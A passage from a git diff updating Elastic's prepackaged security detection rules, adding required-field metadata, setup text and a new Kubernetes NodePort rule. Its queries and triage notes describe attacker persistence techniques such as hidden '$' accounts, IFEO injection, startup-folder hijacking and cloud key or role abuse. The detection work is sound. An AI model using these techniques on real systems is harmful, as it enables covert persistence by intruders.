happen legitimately. Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Creation of a Hidden Local User Account\n\nAttackers can create accounts ending with a `$` symbol to make the account hidden to user enumeration utilities and\nbypass detections that identify computer accounts by this pattern to apply filters.\n\nThis rule uses registry events to identify the creation of local hidden accounts.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positive (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Delete the hidden account.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where registry.path : \"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\*$\\\\\"\n", "references": [ "https://blog.menasec.net/2019/02/threat-hunting-6-hiding-in-plain-sights_8.html", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/tree/master/2020/2020.12.15.Lazarus_Campaign" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json index 3acae337041b3..491b8c0a2ffca 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_ifeo_injection.json @@ -14,6 +14,18 @@ "references": [ "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 41, "rule_id": "6839c821-011d-43bd-bd5b-acff00257226", "severity": "medium", @@ -50,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json index 45f74b00c7253..c503b4e4c63df 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_evasion_registry_startup_shell_folder_modified.json @@ -12,6 +12,18 @@ "name": "Suspicious Startup Shell Folder Modification", "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for\npersistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this\nbehavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for\nan attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate the activity is not related to planned patches, updates, network administrator activity or legitimate software\ninstallations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based\non new software installations, patches, or other network administrator activity. Before entering further investigation,\nit should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "registry where\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c8b150f0-0164-475b-a75e-74b47800a9ff", "severity": "high", @@ -48,5 +60,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json index 6946dd97761b6..a2905e660879d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exchange_suspicious_mailbox_right_delegation.json @@ -14,10 +14,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Exchange Suspicious Mailbox Right Delegation", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and \no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -43,7 +82,7 @@ "subtechnique": [ { "id": "T1098.002", - "name": "Exchange Email Delegate Permissions", + "name": "Additional Email Delegate Permissions", "reference": "https://attack.mitre.org/techniques/T1098/002/" } ] @@ -53,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json new file mode 100644 index 0000000000000..1d3bf41aaf352 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_exposed_service_created_with_type_nodeport.json @@ -0,0 +1,70 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects an attempt to create or modify a service as type NodePort. The NodePort service allows a user to externally expose a set of labeled pods to the internet. This creates an open port on every worker node in the cluster that has a pod for that service. When external traffic is received on that open port, it directs it to the specific pod through the service representing it. A malicious user can configure a service as type Nodeport in order to intercept traffic from other pods or nodes, bypassing firewalls and other network security measures configured for load balancers within a cluster. This creates a direct method of communication between the cluster and the outside world, which could be used for more malicious behavior and certainly widens the attack surface of your cluster.", + "false_positives": [ + "Developers may have a legitimate use for NodePorts. For frontend parts of an application you may want to expose a Service onto an external IP address without using cloud specific Loadbalancers. NodePort can be used to expose the Service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort Service from outside the cluster, by requesting :. NodePort unlike Loadbalancers, allow the freedom to set up your own load balancing solution, configure environments that aren't fully supported by Kubernetes, or even to expose one or more node's IPs directly." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Exposed Service Created With Type NodePort", + "note": "", + "query": "kubernetes.audit.objectRef.resource:\"services\" and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\") and kubernetes.audit.requestObject.spec.type:\"NodePort\"\n", + "references": [ + "https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types", + "https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport", + "https://www.tigera.io/blog/new-vulnerability-exposes-kubernetes-to-man-in-the-middle-attacks-heres-how-to-mitigate/" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.type", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "65f9bccd-510b-40df-8263-334f03174fed", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1133", + "name": "External Remote Services", + "reference": "https://attack.mitre.org/techniques/T1133/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json index cdef729404ceb..2044b51b84018 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_finder_sync_plugin_pluginkit.json @@ -18,6 +18,33 @@ "references": [ "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "37f638ea-909d-4f94-9248-edd21e4a9906", "severity": "medium", @@ -46,5 +73,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json index 5ca2bfe07364a..66d1527d06268 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_folder_action_scripts_runtime.json @@ -11,10 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Folder Action Script", - "query": "sequence by host.id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\")] by process.parent.pid\n", + "query": "sequence by host.id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\", \"info\") and process.name == \"com.apple.foundation.UserScriptService\"] by process.pid\n [process where event.type in (\"start\", \"process_started\") and process.name in (\"osascript\", \"python\", \"tcl\", \"node\", \"perl\", \"ruby\", \"php\", \"bash\", \"csh\", \"zsh\", \"sh\") and\n not process.args : \"/Users/*/Library/Application Support/iTerm2/Scripts/AutoLaunch/*.scpt\"\n ] by process.parent.pid\n", "references": [ "https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], "risk_score": 47, "rule_id": "c292fa52-4115-408a-b897-e14f684b3cb7", "severity": "medium", @@ -59,5 +91,5 @@ } ], "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json index d586982dcf513..da8ab25d3508f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_iam_service_account_key_deletion.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP IAM Service Account Key Deletion", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.DeleteServiceAccountKey and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccountKey and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts", "https://cloud.google.com/iam/docs/creating-managing-service-account-keys" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9890ee61-d061-403d-9bf6-64934c51f638", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json index 88249ad30adb9..43704fc4e8f45 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_key_created_for_service_account.json @@ -13,14 +13,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Key Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateServiceAccountKey and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccountKey and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts", "https://cloud.google.com/iam/docs/creating-managing-service-account-keys" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0e5acaae-6a64-4bbc-adb8-27649c03f7e1", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json index d37cc80d562cd..d93609c6af492 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gcp_service_account_created.json @@ -13,13 +13,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Service Account Creation", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateServiceAccount and event.outcome:success\n", + "note": "", + "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccount and event.outcome:success\n", "references": [ "https://cloud.google.com/iam/docs/service-accounts" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7ceb2216-47dd-4e64-9433-cddc99727623", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -48,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json index 6f19c1f60c05a..8f4360e9f603d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_admin_role_assigned_to_user.json @@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Admin Role Assigned to a User", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ASSIGN_ROLE\n", "references": [ "https://support.google.com/a/answer/172176?hl=en" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "68994a6c-c7ba-4e82-b476-26a26877adf6", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json index 6d08829d787f4..d29698c5a919a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json @@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace API Access Granted via Domain-Wide Delegation of Authority", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:AUTHORIZE_API_CLIENT_ACCESS\n", "references": [ "https://developers.google.com/admin-sdk/directory/v1/guides/delegation" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "acbc8bb9-2486-49a8-8779-45fb5f9a93ee", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json index 7c92fa8fd6721..79575a29738e5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_custom_admin_role_created.json @@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Custom Admin Role Created", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:CREATE_ROLE\n", "references": [ "https://support.google.com/a/answer/2406043?hl=en" ], + "related_integrations": [ + { + "package": 